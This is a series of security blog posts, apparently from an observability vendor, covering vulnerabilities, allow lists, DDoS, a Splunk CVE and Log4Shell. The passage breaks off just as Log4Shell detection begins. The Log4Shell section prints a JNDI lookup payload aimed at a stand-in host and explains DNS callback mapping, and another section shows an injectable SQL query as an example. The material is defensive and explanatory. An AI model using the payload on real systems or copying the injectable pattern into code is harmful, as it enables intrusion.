Exploit vs. Vulnerability: What Is the Difference?

Whenever engineers discover a new security issue, the question arises every time: is this an exploit or vulnerability? What is a software vulnerability? How does it differ from an exploit? 

A vulnerability is a gap in the armor or weakness that allows people to enter. The exploit is the mechanism that someone uses to get in. For example, a door with a fragile lock has a vulnerability. The exploit uses the keys, hammer, or lockpick to break the lock. Let’s explore these definitions and look at some recent security incidents.

What is a software vulnerability?

A software vulnerability is some weakness in how a piece of software has been built. These come in many different forms, but some of the most common are:

  • Unsanitized inputs allow a user to enter something into a piece of software that changes its intended behavior.
  • Insecure requests issued from the website, such as websites that respond to plain HTTP requests.
  • Pages that require a lot of system resources to load.

These vulnerabilities are the first port of call for a hacker, and this is what takes up the majority of a malicious agent’s time. Examples of these exploits are the Log4Shell vulnerability, the GHOST vulnerability, and the Pwnkit vulnerability. Malicious agents hunt for these known vulnerabilities, looking for some gap in your application, from which they can launch a more sophisticated attack by using an exploit.

Exploit vs. Vulnerability – one is more subtle than the other

There is another, more subtle distinction, when reviewing the question of exploit vs. vulnerability. A vulnerability might not have obvious relevance in a security context, but the exploit almost always does. An exploit might be as simple as allowing you to log in using a specific protocol or a new feature that saves your details in a central database. This is the problem: a vulnerability is any configuration or code that can be misused unexpectedly. This makes it very, very difficult to write vulnerability “free” code.

So what is an exploit in cybersecurity?

An exploit is some malicious code used to take advantage of a vulnerability. Most exploits have a set of common goals:

  • Steal private information from a system so that information can be sold.
  • Slow down or completely stop a system from working, so a ransom can be demanded.
  • Seize control of a server, to mount further attacks.

For example, the Log4Shell vulnerability was a weakness in how the Log4j program allowed users to execute arbitrary code based on values that should have been printed in the logs. This was an example of poor input sanitization. Many different exploits were subsequently implemented that attempted to use this vulnerability in different ways – some of them allowed you to plug in your own code while others exposed the private environment variables of the software. 

But what about a Zero-Day vulnerability?

A zero-day vulnerability is a vulnerability that is made public without a patch already available. This means that you have zero days to fix it. Zero-day vulnerabilities are a currency unto themselves, and there are black markets that will trade these vulnerabilities before they are ever made public.

The aforementioned Log4Shell vulnerability was an example of a zero-day vulnerability because it became common knowledge before a patch was implemented and was already being used in production code. When we’re assessing exploit vs. vulnerability, this is important to understand. A vulnerability is a weakness, so a gap in the armor was presented to the world before any fix was available. This is why Log4Shell was such a big event. It was a gap in almost everyone’s armor, and it was shown to the world before they could do anything about it. 

Another example is the Heartbleed vulnerability, which allowed attackers to read protected memory areas over the Internet. This was a vulnerability detected in the OpenSSL libraries, and meant it had been proliferated amongst software for years.

Defending your organization against cyber attacks

Staying one step ahead of a cyber attack is an ongoing battle, with more sophisticated exploits built for more nuanced vulnerabilities. There are a few things engineers can do that will significantly improve their security posture.

Patch and never stop patching

Software is rarely wholly original. Most commonly, it’s a tapestry of open source and proprietary software that has been linked together with custom code. This means that one of the most effective ways to minimize vulnerabilities is to keep all of your dependencies up to date. This will ensure that you aren’t caught out by any legacy vulnerabilities that may be hanging around in your software.

Red-teaming and penetration testing

Red-teaming is the practice of hiring engineers to attempt to hack into your system. Your blue team will then actively try to defend against these attacks. This is a brilliant exercise because it helps your engineers become more aware of their system, weaknesses, and strengths. It also helps to establish ways of working when the organization is truly under attack. A more thorough alternative is to pay for an external penetration test, where a highly trained security specialist will attempt to find and document the major weaknesses in your system. A combination of these two strategies gives you an excellent understanding of the major weaknesses in your system.

Code scanning and CI/CD

Static code analysis allows you to dive deep into your code base and look for any code patterns that may indicate the presence of common vulnerabilities. For example, a code snippet that looks like this may trigger a flag for a SQL injection vulnerability:

String sqlQuery = “SELECT * FROM “ + table + “ WHERE VAL LIKE ‘“ + input + “‘“

Code scanning takes some of the burden off of your software engineers and automates some of the more mundane code checkings. However, it doesn’t completely lift the burden, and more complex vulnerabilities still need to be investigated to ensure they don’t pose any risk to your security posture.

Invest in your observability as soon as possible

Once you’ve got some tremendous preventative strategies in place, you need to look at how you defend an attack in progress. The component of your system that will be integral to your success is your observability stack. Knowing precisely what your system is doing is essential to understanding when something is happening out of the ordinary. Whether you’re detecting a DDOS attack or noticing some unwanted IP addresses, it all begins with an effective, well-built, thorough observability function. 

What is a Security Whitelist?

In April 2022 alone, there were 14.3m records breached due to 80 significant security incidents. These incidents make up a complex, shifting landscape of cyberattacks that require increasingly sophisticated defenses. While many of our methods are becoming more complex, some of our mechanisms are timeless, like the security whitelist. Also called an “allow list,” the security whitelist defines the permitted actions and blocks everything else. 

Whitelist vs. Blocklist

Security whitelists operate on a deny by default policy, where anything that hasn’t been expressly allowed will be blocked. This is different from a blocklist, where everything is permitted except for the cases that a user has specified – also known as an allow by default policy. 

Through a security lens, the whitelist offers a greater potential for security. If something is “unknown,” it is denied automatically. New processes, IP addresses, applications, or file patterns are blocked straight away, which removes a huge part of your attack surface. However, it comes at a price.

If you deny everything by default, you need to allow all of the desirable processes. This is fine if you’re working on a system with only a few allowed actions. For example, a system that has a list of permitted users. However, if you’re running a public website, placing a whitelist on all incoming traffic would mean that all users are denied access to your site. A blocklist is helpful here. Allow everyone and block people who break the rules. What you lose in security, you gain in accessibility. This trade-off, part of the C-I-A triad, is a common challenge in information security. Let’s explore how whitelists are used in production environments to secure systems and keep data secure.

Email whitelisting

If you’re using an email provider like Google or Microsoft, you already have a list of all accounts in your organization. Using this information, you can automatically maintain an effective whitelist of authorized senders and block any dangerous 3rd parties. This would catch phishing attacks before they can do any damage. If your whitelist allows anyone from @Coralogix.com and an email comes in from @Cora1ogix, your whitelist will catch that. 

Of course, the challenge is an operational one. Email providers need to be able to process emails from authorized sources, such as from inside an organization, and external sources, like 3rd parties. This is why most email providers operate on a blocklist mechanism, where any emails are processed, suspicious activity is flagged, and the relevant accounts are blocked.

IP whitelisting

IP security whitelists are much more common. There are a few instances where you want to make use of an IP whitelist:

  • If you’re hosting a private service with a select group of customers, and you want to prevent network access to anyone outside of that group
  • You have private services that are not and will never be customer-facing

IP whitelists are the foundation of a robust, layered security model. They are essential in securing systems that have both public-facing and internal components. However, they can become an operational nightmare if you have public-facing services only. In this instance, a blocklist makes more sense. Blocklists usually take the form of web application firewalls that will analyze traffic as it passes through and immediately detects malicious behavior.

File and application whitelisting

Large organizations will typically set up employee machines with an application whitelist. Application whitelisting means that users are permitted only to use the tools they need for their job, and nothing more. This minimizes the attack surface of malicious code because the whitelist will automatically block it, which is also a great way of avoiding fines for using unlicensed software.

This is an example of perimeter security. Focusing on ensuring new threats don’t enter at the edges of your system. It works, but if your perimeter security is too strict, you’ll prevent legitimate users from getting things done. For example, software engineers use an ever-changing selection of software tools. Without an easy way to approve new applications and permissions, strict whitelisting of applications can cause serious interruptions to legitimate work. 

More than that, in the age of remote working, “bring your own device” has become ubiquitous, with 47% of companies in the UK operating a BYOD approach during the pandemic. It is challenging to whitelist an employee’s personal computer and invites complex ethical and privacy concerns.

A middle ground is implementing a blocklist approach, such as those found in antivirus software. Antivirus software takes fingerprints (known as hashes) of malicious code and regularly scans applications and files on the host computer. If it detects these malicious code patterns, it quarantines the offending application and informs the user. While this is less secure, it does pose less risk of interrupting legitimate work.

Whitelists for input validation

Input validation is standard practice in software engineering. Attacks like the SQL injection and the Log4Shell vulnerability are caused by sufficient input validation. The Log4Shell attack takes a value that would otherwise be harmlessly printed into application logs. It turns it into a remote code execution attack, allowing a successful attacker to run any code. 

Typical approaches to validating input are using a regex check as a filter. For example, if someone sends up a string value that should be an email, a simple bit of regex like this will detect if it is valid or not: w-]+@([w-]+.)+[w-]+

This creates an effective whitelist because you’re stating upfront what is permitted, and everything else is rejected. This is a non-negotiable step in defending your APIs and front-end applications from exploitation by malicious agents.

Summary

Allow lists offer the ability to maximize your security position, but they naturally come with the operational burden of ensuring that they do not hamper legitimate use of your system. Blocklists are the complete opposite end of the spectrum and allow you to minimize the impact on your users, but the shoe is on the other foot – now you need to keep up with threats on the broader market to ensure your blocklist doesn’t allow malicious traffic. Whichever way you choose, an access control list of this kind is vital for minimizing the risk of an attack that could have crippling consequences for your business.

What is the Most Vulnerable Data My Company Holds?

Data security is on every priority list in 2022. With the frequency of breaches never higher, many businesses assess their situation and ask cybersecurity questions.

With cybersecurity policy, everything boils down to risk. Ultimately, every decision-maker wants to know, “how likely are we to be attacked?”

Many believe cybercriminals only target certain kinds of data. Sensitive information, high-value financial data, and medical records are all widely accepted to carry a high risk.

The misconception? That storing none of the above means little-to-no risk. Almost every document stored on your company servers is a potential target for cybercriminals in today’s threat landscape. 

We will break down the data types that carry the highest risk, so you’ll finally know how much potential threat is stored in your servers.

The scale of data theft

Data and information theft have always accounted for a large portion of cybercrime. Some estimates have the frequency at 44 records stolen per second. That’s 3,809,448 per day globally. Less conservative figures put the number as high as 22.5 million.

Whether the actual figure is closer to three or twenty-two million is irrelevant. Both ends of the scale are high. What matters is that every day your data and records are at risk of being stolen.

Why do cybercriminals want my company data and records?

The reason data theft remains a favorite pastime of cybercriminals is primarily financial. While this is obvious for certain kinds of data (such as customer payment information), the financial incentive for theft isn’t as straightforward as others.

Hackers and cybercriminals can turn almost any stolen data into a profit. Even seemingly meaningless information is valuable to somebody, somewhere, making it worth stealing. Sometimes stolen data is sold on the dark web, and for others, it is used for ransom attacks. The list of ways cybercriminals can capitalize on stolen data is almost as long as one of the ways they can steal it.

Remember, not all hackers are after huge sums. Many small businesses are severely disrupted by cybercriminals seeking to walk away with as little as a few hundred dollars (and some by thrill-hackers who aren’t financially motivated).

As a rule of thumb, never assume your data and records are safe because they don’t seem financially valuable. No matter how much you believe your data to be “worth” to a hacker, it is still at risk, and the costs of a breach to your business are always high.

The types of data most vulnerable to attempted theft

Now that we’ve covered the scale of data theft let’s break down the highest-risk types of data and records that businesses like yours may have on their servers.

Payment data.

71% of all data breaches are financially motivated. It’s unsurprising then that payment data is the type of record most targeted by hackers.

This is why many small businesses’ belief about their size makes them unappealing to cybercriminals is so dangerous.

Stolen customer credit cards, visa debits, PayPal, or other payment credentials are a source of easy income for hackers. There are many high-profile incidents where gigabytes of customer payment information were stolen from companies and sold on the black market.

One of the most notorious examples is the Adobe breach of 2013. Hackers stole nearly 3 million credit card numbers from a compromised database of 38 million Adobe users. The costs to Adobe were known to reach at least $1.1million, but the exact total when the (undisclosed) settlements with former users are factored in is still unknown.

It’s clear why 3 million credit card numbers are an enticing prospect for a cybercriminal. While there are few companies with as many users as Adobe, the high-profile breach they experienced was far from an isolated incident.

Why the Adobe breach wasn’t an isolated incident

Selling stolen data on the black market is risky and isn’t the goal for most hackers. Most stolen payment information is used to skim small amounts, directly purchase goods, or open new credit lines to be drained into separate accounts controlled by cybercriminals.

This makes small businesses incredibly vulnerable. If your aim isn’t to sell millions of payment details, there’s little incentive to hack a corporation like Adobe with a dedicated cybersecurity team.

Most cybercriminals are likely to target less-protected payment records held by SMEs. Not only are these easier to obtain, but they’re also far less likely to attract attention (meaning the operation can continue another day).

It’s highly unlikely you will have no customer payment info on your servers in 2022. Whether dealing with three or three million users, you must keep their payment data secure.

Authentication Details

Authentication details are perhaps the most dangerous records to lose in a breach. All it takes is one compromised login for cybercriminals to browse your systems at their leisure. Once they have access, it’s only a matter of time before further data (like customer financial records) is seized.

Credential-based attacks aren’t rare. 81% of breaches in 2020 utilized stolen and/or weak passwords. Authentication details and credentials are obtained in many ways. Keylogging software is one, but targeting employees to deceive them into handing over login information is a common method.

Compromised login details are a huge security risk. Once a cybercriminal is in your systems under the guise of a valid user, they can operate more or less undetected. This leaves them free to steal further data, deploy malware, or take your systems offline entirely.

How many stolen passwords are out there?

In 2020, an audit of several known dark web black markets revealed there were at least 15 billion individual login credentials available for sale. These weren’t only for popular platforms like Facebook and online banks but also private company servers.

The same report found that these domain administrator accounts were auctioned for an average of $3,139, with some going for as much as $120,000. Your business’s authentication data is a target for theft in this context, isn’t it?

If you’re an SME, you’re seen as an easy target. Staff are less likely to be trained in online safety, for one thing. According to IBM, human error is a ‘major contributing cause’ in 95% of data breaches. Password hygiene, multi-factor authentication, and secure login credentials are essential, especially for small businesses.

It’s almost certain that those 15 billion black market credentials included hundreds, maybe even thousands, of businesses like yours.

Medical records, customer documents, and other sensitive information

It’s no secret that sensitive and confidential records like medical documents are a target for cybercriminals. There have been many high-profile healthcare data breaches. In 2015 the second largest healthcare insurer in the US, Anthem Inc, had records of 80 million customers stolen. This irreparably damaged their reputation, which led to Anthem paying a $39 million settlement.

The stolen data contained no medical treatment records. The hackers seized names, dates of birth, addresses, employment information, and Social Security numbers. Why is that important? Because they’re records that almost every company will hold.

The customer information on your database doesn’t have to be medical treatments, criminal records, or personal conversations (like any app with a message function, for example). If your customers, users, or clients leave any personal details in your care, cybercriminals want them.

Which sector is most at risk of customer data theft?

While no treatment records were stolen in the Anthem breach, the fact remains that healthcare is one of the most at-risk sectors. Some estimates claim that as many as 1 in 8 US citizens have had medical records compromised in a breach.

It’s a misconception that the healthcare sector is at risk exclusively because of the sensitivity of medical records. This is only partially correct. It’s also because healthcare is one of the world’s largest (and accessible) industries.

This is why retail and accommodation/tourism are just as vulnerable to data theft as finance, healthcare, and the public sector. E-commerce records aren’t compromising or sensitive, but they exist in abundance. It’s not only sensitive records at risk; any record from any industry is a target.

So, is ANY of my data safe?

The short answer? No. If the message we’re trying to send isn’t clear, all the data your company holds is vulnerable. There are no records or information stored in your data centers that aren’t a potential hackers’ target.

As all cybersecurity professionals will tell you, the question isn’t if you’ll be a target of data theft; it’s when.

Modern solutions for modern threats

Fortunately, it is possible to keep your data secure in 2022. The problem many face is applying 20th-century thinking to the 21st-century threat landscape.

Your data security solution shouldn’t start with the question, “what specifically is at risk.” In so many of the examples above, successful data thieves exploited “low risk” vulnerabilities.

21st-century cybersecurity should be built on a system of assumed risk and total system visibility. Every KB of network traffic could contain the next threat, and every PDF scan, line of code, or customer database is a possible target.

Observability: A Cybersecurity Essential

Keeping all of your data records secure means ensuring the entire system they’re in is observable. That’s why platforms like ours are essential. Almost every data breach we’ve used as an example could have been avoided if the cybercriminals couldn’t operate undetected.

A fully visible system means no hidden blind spots for hackers to exploit. The answer to this piece’s titular question is “all of it.” It’s paramount your security solution reflects this.

Splunk Indexer Vulnerability: What You Need to Know

A new vulnerability, CVE-2021-342 has been discovered in the Splunk indexer component, which is a commonly utilized part of the Splunk Enterprise suite. We’re going to explain the affected components, the severity of the vulnerability, mitigations you can put in place, and long-term considerations you may wish to make when using Splunk.

What is the affected component?

The Splunk indexer is responsible for sorting and indexing data that the Splunk forwarder sends to it. It is a central place where much of your observability data will flow as part of your Splunk setup. The forwarder and the indexer communicate with one another using the Splunk 2 Splunk (S2S) protocol. 

The vulnerability itself lies within the validation that is inherent within the S2S protocol. The S2S protocol allows for a field type called field_enum_dynamic. What this field allows you to do is send a numerical value in your payload, and have it automatically mapped to some corresponding text value. This is useful because your machines can talk in status codes, but those codes can be dynamically mapped to human-readable text.

What is the impact of the vulnerability?

This field type, field_enum_dynamic is not validated properly, which means that a specially crafted value can enable a malicious attacker to read memory that they shouldn’t be able to. This is called an Out of Bounds (OOB) read vulnerability, and essentially means an attacker can go out of their intended boundaries. 

An alternative attack might be to intentionally trigger a page fault, which would shut down the Splunk service. Doing this repeatedly would result in a Denial of Service (DoS) attack. For these reasons, this CVE is considered high severity with a score of 7.5. 

What mitigations can you put in place?

Splunk has released patches for the impacted components. The new versions that are not vulnerable to this attack are 7.3.9, 8.0.9, 8.1.3, and 8.2.0. Priority number one should be aiming to get to these versions, where this attack has been totally mitigated.

If upgrading is not something you can do, then you may wish to look into implementing SSL for your Splunk forwarders or simply enable forwarder access control, using a token. These steps will make it more difficult for a malicious attacker to send specially crafted packets to your indexer because they’ll need to compromise the SSL certificate or the token first.

What do we need to think about in the long term?

OOB vulnerabilities can be particularly nasty. Not just because of the possibility of leaking information in Splunk, but if your attacker has some specialist knowledge of your system, they can expand to memory that is being used by completely different applications. For example, if an attacker knows that your SSL certificates are loaded into a different area of memory. They might even be able to implement a full memory dump, one packet at a time. 

This means that the danger of this Splunk vulnerability isn’t just in the Splunk data you may leak, but in the much more sensitive information that the attacker may be able to access. This means that you immediately become dependent on the security of the underlying infrastructure.

How secure is your on-premise infrastructure?

It is tempting to think that your on-premise data centers are a bastion of security. You have complete control over their configuration, so you’re able to finely tune them. In reality, this may not be the case. It’s very easy to forget to enable Address Space Layout Randomization (ASLR) or Data Execution Prevention (DEP) on your instances, both of which would make these types of vulnerabilities more difficult to exploit. These are just two of a number of switches that you need to understand, to build and deploy secure hardware in your data center.

A cloud provider like AWS will automatically enable these types of features for you, so that your virtual machine is immediately more secure. If this type of attack occurred in a cloud-based environment, it would be much more difficult to exploit adjacent applications in memory, because cloud environments often come with a lot of very sensible security defaults to prevent processes from reading beyond their allotted memory. This is part of the reason why 61% of security researchers say that a breach in a cloud environment is usually equally or less dangerous than the same breach in an on-premise environment. 

Would a SaaS observability tool be impacted by this?

Splunk indexers operate within the tenant infrastructure, which means that a vulnerability with the Splunk component is an inherent vulnerability in the user’s software. This decreases the control that the user has because they aren’t the ones producing patches. 

Coralogix is a central, multi-tenant, full-stack observability platform that provides a layer of abstraction between the internal workings of your system and your observability data, preventing vulnerabilities like CVE-2021-342 from being chained with other attacks. 

5 Cybersecurity Tools to Safeguard Your Business

With the exponential rise in cybercrimes in the last decade, cybersecurity for businesses is no longer an option — it’s a necessity. Fuelled by the forced shift to remote working due to the pandemic, US businesses saw an alarming 50% rise in reported cyber attacks per week from 2020 to 2021. Many companies still use outdated technologies, unclear policies, and understaffed cybersecurity teams to target digital attacks.

So, if you’re a business looking to upgrade its cybersecurity measures, here are five powerful tools that can protect your business from breaches.

1. Access Protection

Designed to monitor outgoing and incoming network traffic, firewalls are the first layer of defense from unauthorized access in private networks. They are easy to implement, adopt, and configure based on security parameters set by the organization.

Among the different types of firewalls, one of the popular choices among businesses is a next-generation firewall. A next-generation firewall can help protect your network from threats through integrated intrusion prevention, cloud security, and application control. A proxy firewall can work well for companies looking for a budget option.

Even though firewalls block a significant portion of malicious traffic, expecting a firewall to suffice as a security solution would be a mistake. Advanced attackers can build attacks that can bypass even the most complex firewalls, and your organization’s defenses should catch up to these sophisticated attacks. Thus, instead of relying on the functionality of a single firewall, your business needs to adopt a multi-layer defense system. And one of the first vulnerabilities you should address is having unsecured endpoints.

2. Endpoint Protection

Endpoint Protection essentially refers to securing devices that connect to a company’s private network beyond the corporate firewall. Typically, these range from laptops, mobile phones, and USB drives to printers and servers. Without a proper endpoint protection program, the organization stands to lose control over sensitive data if it’s copied to an external device from an unsecured endpoint.

Softwares like antivirus and anti-malware are the essential elements of an endpoint protection program, but the current cybersecurity threats demand much more. Thus, next-generation antiviruses with integrated AI/ML threat detection, threat hunting, and VPNs are essential to your business.

If your organization has shifted to being primarily remote, implementing a protocol like Zero Trust Network Access (ZTNA) can strengthen your cybersecurity measures. Secure firewalls and VPNs, though necessary, can create an attack surface for hackers to exploit since the user is immediately granted complete application access. In contrast, ZTNA isolates application access from network access, giving partial access incrementally and on a need-to-know basis. 

Combining ZTNA with a strong antivirus creates multi-layer access protection that drastically reduces your cyber risk exposure. However, as we discussed earlier, bad network actors who can bypass this security will always be present. Thus, it’s essential to have a robust monitoring system across your applications, which brings us to the next point…

3. Log Management & Observability

Log management is a fundamental security control for your applications. Drawing information from event logs can be instrumental to identifying network risks early, mitigating bad actors, and quickly mitigating vulnerabilities during breaches or event reconstruction.

However, many organizations still struggle with deriving valuable insights from log data due to complex, distributed systems, inconsistency in log data, and format differences. In such cases, a log management system like Coralogix can help. It creates a centralized, secure dashboard to make sense of raw log data, clustering millions of similar logs to help you investigate faster. Our AI-driven analysis software can help establish security baselines and alerting systems to identify critical issues and anomalies. 

A strong log monitoring and observability system also protects you from DDoS attacks. A DDoS attack floods the bandwidth and resources of a particular server or application through unauthorized traffic, typically causing a major outage. 

With observability platforms, you can get ahead of this. Coralogix’s native Cloudflare integrations combined with load balancers give you the ability to cross-analyze attack and application metrics and enable your team to mitigate such attacks. Thus, you can effectively build a DDOS warning system to detect attacks early.

Along with logs, another critical business data that you should monitor regularly are emails. With over 36% of data breaches in 2022 attributed to phishing scams, businesses cannot be too careful.

4. Email Gateway Security

As most companies primarily share sensitive data through email, hacking email gateways is a prime target for cybercriminals. Thus, a top priority should be robust filtering systems to identify spam and phishing emails, embedded code, and fraudulent websites. 

Email gateways act as a firewall for all email communications at the network level — scanning and auto-archiving malicious email content. They also protect against business data loss by monitoring outgoing emails, allowing admins to manage email policies through a central dashboard. Additionally, they help businesses meet compliance by safely securing data and storing copies for legal purposes. 

However, the issue here is that sophisticated attacks can still bypass these security measures, especially if social engineering is involved. One wrong click by an employee can give hackers access to an otherwise robust system. That’s why the most critical security tool of them all is a strong cybersecurity training program.

5. Cybersecurity Training

Even though you might think that cybersecurity training is not a ‘tool,’ a company’s security measures are only as strong as the awareness among employees who use them. In 2021, over 85% of data breaches were associated with some level of human error. IBM’s study even found out that the breach would not have occurred if the human element was not present in 19 out of 20 cases that they analyzed.

Cybersecurity starts with the people, not just the tools. Thus, you need to implement a strong security culture about security threats like phishing and social engineering in your organization. All resources related to cybersecurity should be simplified and made mandatory during onboarding. These policies should be further reviewed, updated, and re-taught semi-annually in line with new threats. 

Apart from training, the execution of these policies can mean the difference between a hackable and a secure network. To ensure this, regular workshops and phishing tests should also be conducted to identify potential employee targets. Another way to increase the effectiveness of these training is to send out cybersecurity newsletters every week. 

Some companies like Dell have even adopted a gamified cybersecurity training program to encourage high engagement from employees. The addition of screen locks, multi-factor authentication, and encryption would also help add another layer of security. 

Upgrade Your Cybersecurity Measures Today!

Implementing these five cybersecurity tools lays a critical foundation for the security of your business. However, the key here is to understand that, with cyberattacks, it sometimes just takes one point of failure. Therefore, preparing for a breach is just as important as preventing it. Having comprehensive data backups at regular intervals and encryption for susceptible data is crucial. This will ensure your organization is as secure as your customers need it to be —  with or without a breach!

IoT Security: How Important are Logs for System?

IoT has rapidly moved from a fringe technology to a mainstream collection of techniques, protocols, and applications that better enable you to support and monitor a highly distributed, complex system. One of the most critical challenges to overcome is processing an ever-growing stream of analytics data, from IoT security data to business insights, coming from each device. Many protocols have been implemented for this, but could logs provide a powerful option for IoT data and IoT monitoring?

Data as the unit of currency

The incredible power of a network of IoT devices comes from the sheer volume and sophistication of the data you can gather. All of this data can be combined and analyzed to create actionable insights for your business and operations teams. This data is typically time-series data, meaning that snapshots of values are taken at time intervals. For example, temperature sensors will regularly broadcast updated temperatures with an associated timestamp. Another example might be the number of requests to non-standard ports when you’re concerned with IoT security. The challenge is, of course, how to transmit this much data to a central server, where it can be processed. IoT data collection typically produces a large volume of information for a centralized system to process.

The thing is, this is already a very well-understood problem in the world of log analytics. We typically have hundreds, if not thousands, of sources (virtual machines, microservices, operating system logs, databases, load balancers, and more) that are constantly broadcasting information. IoT software doesn’t pose any new challenges here! Conveniently, logs are almost always broadcast with an associated timestamp too. Rather than reinventing the wheel, you can simply use logs as your vehicle for transmitting your IoT data to a central location.

Using the past to predict the future

When your data is centralized, you can also begin to make predictions. For example, in the world of IoT security, you may wish to trigger alarms when certain access logs are detected on your IoT device because they may be the footprint of a malicious attack. In a business context, you may wish to conclude certain trends in your measurements, for example, if the temperature has begun to increase on a thermostat sharply, and its current trajectory means it’s going to exceed operational thresholds soon. It’s far better to tell the user before it happens than after it has already happened.

This is regularly done with log analytics and metrics. Rather than introducing highly complex and sophisticated time-series databases into your infrastructure, why not leverage the infrastructure you already have?

You’ll need your observability infrastructure anyway!

When you’re building out your complex IoT system, you’re inevitably going to need to build out your observability stack. With such a complex, distributed infrastructure, IoT monitoring and the insights it brings will be essential in keeping your system working. 

This system will need to handle a high volume of traffic and will only increase when your logging system is faced with the unique challenges of IoT software. For example, logs indicate the success of a firmware rollout across thousands of devices worldwide. This is akin to having thousands of tiny servers that must be updated. Couple that with the regular operating logs that a single server can produce, which should put your IoT monitoring challenge into perspective. 

Log analytics provide a tremendous amount of information and context that will help you get to the bottom of a problem and understand the overall health of your system. This is even more important when you consider that your system could span across multiple continents, with varying degrees of connectivity, and these devices may be moving around, being dropped, or worse! Without a robust IoT monitoring stack that can process the immense volumes associated with IoT data collection, you’re going to be left confused as to why a handful of your devices have just disappeared.

Improving IoT Security

With this increased observability comes the power to detect and mitigate security threats immediately. Take the recent Log4Shell vulnerability. These types of vulnerabilities that exist in many places are challenging to track and mitigate. With a robust observability system optimized for the distributed world of IoT security, you will already have many of the tools you need to avoid these kinds of serious threats.

Your logs are also in place for as long as you like, with many long-term archiving options if you need them. This means that you can respond instantly, and you can reflect on your performance in the long term, giving you vital information to inspect and adapt your ways of working. 

Conclusion

IoT security, observability, and operational success are a delicate balance to achieve, but what we’ve explored here is the potential for log analytics to take a much more central role than simply an aspect of your monitoring stack. A river of information, from your devices, can be analyzed by a wealth of open source and SaaS tools and provide you with actionable insights that can be the difference between success and failure.

DDOS Attacks: How to Protect Yourself from the Political Cyber Attack

In the past 24 hours, funding website GiveSendGo has reported that they’ve been the victim of a DDOS attack, in response to the politically charged debate about funding for vaccine skeptics. The GiveSendGo DDOS is the latest in a long line of political cyberattacks that have relied on the DDOS mechanism as a form of political activism. There were millions of these attacks in 2021 alone. 

But wait, what is a DDOS attack?

Most attacks rely on some new vulnerability being released into the wild, like the Log4Shell vulnerability that appeared in December 2021. DDOS attacks are slightly different. They sometimes exploit known vulnerabilities, but DDOS attacks have another element at their disposal: raw power.

DDOS stands for Distributed Denial of Service attack. They have a single motive – to prevent the target from being able to deliver their service. This means that when you’re the victim of a DDOS attack, without adequate preparation, your entire system can be brought to a complete halt without any notice. This is the exact thing that the GiveSendGo DDOS attack has done. 

A DDOS attack usually consists of a network of attackers that collaborate together to form a botnet. A botnet is a network of machines willing to donate their processing power in service of an attack. These machines then collaborate to send a vast amount of traffic to a single target, like a digital siege, preventing other legitimate traffic in or out of the website.

What makes DDOS attacks so dangerous?

When a single user is scanning your system for vulnerabilities, a basic intrusion detection system will pick up on some patterns. They usually operate from a single location and can be blacklisted in seconds. DDOS attacks originate from thousands of different points in the botnet and often attempt to mimic legitimate traffic. Detecting the patterns requires a sophisticated observability system that many organizations do not invest in until it’s too late. 

But that’s not all…

It is widespread for DDOS attacks to attract more skilled hackers to the situation who are able to discover and exploit more serious vulnerabilities. DDOS attacks create a tremendous amount of chaos and noise. Monitoring stops working, servers crash, alerts trigger. All of this makes it difficult for your security engineers to defend your infrastructure actively. This may expose weaknesses that are difficult to combat.

Why are these attacks so common in political situations?

With enough volunteers, a DDOS attack can begin without the need for skilled cybersecurity specialists. They don’t rely on new vulnerabilities that require specialized software to be exploited. To make things worse, the people who take part in a DDOS don’t need to be technical experts either. They could be “script kiddies” who can make use of existing software, they could be technical experts or, most commonly, they could be people who can navigate to a website and follow some basic instructions. 

While we don’t know the details of the GiveSendGo DDOS attack yet, we can assume that this attack, like most other DDOS attacks, is the workings of a small group of tech-savvy instigators and a much larger group of contributors. This means that if a situation has enough people around it, a DDOS attack can rapidly form out of nothing and escalate a situation from a disagreement to a commercial disaster.

So what can you do about it?

There are several common steps that companies take to protect themselves from a DDOS attack. Each of these are crucial defensive mechanisms to ensure that if you do find yourself on the receiving end of a DDOS, you’re able to stay in service long enough to defend yourself.

Making use of a CDN and it was crucial in the GiveSendGo DDOS attack

Content Distribution Networks (CDN) provide a layer between you and the wider Internet. Rather than directly exposing your services to the public, use a CDN to distribute your content globally. CDNs have several great benefits, such as speeding up page load times and offering great reliability for your site. 

In the case of a DDOS attack, your CDN can act as a perimeter around your system and take the brunt of the attack. This buys you time to defend against the incoming storm proactively. The CloudFlare CDN has been one of the reasons why GiveSendGo hasn’t completely crashed during the attack. 

Route everything through a Web Application Firewall

A Web Application Firewall (WAF) is a specialized tool to process and analyze incoming traffic. It will automatically detect malicious attacks and prevent them from reaching your system. This step should come after your CDN. The CDN will provide resilience against sudden spikes in traffic. Still, you need this second layer of defense to ensure that anything that makes it through is scrutinized before it is permitted to communicate with your servers.

Invest in your Observability

Automated solutions that sit in front of your system will make your task easier, but they will never fully eliminate the problem. Your challenge is to create an observability stack that can help you filter out the noise of a DDOS attack and focus on the problems you’re trying to solve. 

Coralogix is a battle-tested, enterprise-grade SaaS observability solution that can do just that. That includes everything from machine learning to driven anomaly detection to SIEM/SOAR integrations and some of the most ubiquitous tools in the cybersecurity industry. Coralogix can give you operational insights on a range of typical challenges.

An investment in your observability stack is one of the fundamental steps in achieving a robust security posture in your organization. With the flexibility, performance, and efficiency of Coralogix, you can gain actionable insights into the threats that face your company as you innovate and achieve your goals.

How to Detect Log4Shell Events Using Coralogix

What is Log4Shell?

The Log4J library is one of the most widely-used logging libraries for Java code. On the 24th of November 2021, Alibaba’s Cloud Security Team found a vulnerability in the Log4J, also known as log4shell, framework that provides attackers with a simple way to run arbitrary code on any machine that uses a vulnerable version of the Log4J. This vulnerability was publicly disclosed on the 9th of December 2021.

One of the interesting things about this vulnerability is that it has existed in the code since 2013 and, as far as we know, was not noticed for eight long years.

The way this kind of attack works is straightforward. The attacker needs to know which data in a given application they have control over, as the user, which will eventually be logged. Using that information, the attacker can send a simple text line like ${jndi:ldap://example.com/file} to that field. When the server sends that string to the logger, it will attempt to resolve that string by connecting to an LDAP server at the address ‘example.com.’ 

This will, of course, cause the vulnerable server to use its DNS mechanism to resolve that address first. Therefore, allowing attackers to do a “carpet bombing” and send many variations of this string to many fields, like the “UserAgent” and “X-ForwardedFor” headers. In many cases, the attacker would use the JNDI string to point the vulnerable server to an LDAP server at an address like <the victim’s domain name>.<the field used to attack>.<a random text used as the attack’s ID>.<attacker controlled domain>.

By doing so, the attacker, who has control over the authorized DNS server for his domain, can use this server’s logs to build an index of all domain names and IP addresses that are vulnerable to this kind of attack. This also includes which field is the one vulnerable to it.

More than a single way to detect it

Logs, logs, and more logs

